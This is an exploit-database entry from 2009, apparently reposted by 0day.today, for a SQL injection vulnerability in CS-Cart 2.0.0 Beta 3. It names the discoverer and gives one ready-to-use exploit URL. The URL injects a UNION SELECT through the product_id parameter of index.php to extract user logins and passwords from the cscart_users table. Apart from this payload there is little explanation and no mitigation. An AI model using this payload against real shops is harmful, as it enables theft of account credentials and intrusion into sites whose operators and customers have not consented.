CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability

2009-03-09T00:00:00
ID 1337DAY-ID-4921
Type zdt
Reporter netsoul
Modified 2009-03-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability
=============================================================


CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
#####################################################

Exploit:

http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*


#####################################################



#  0day.today [2018-02-19]  #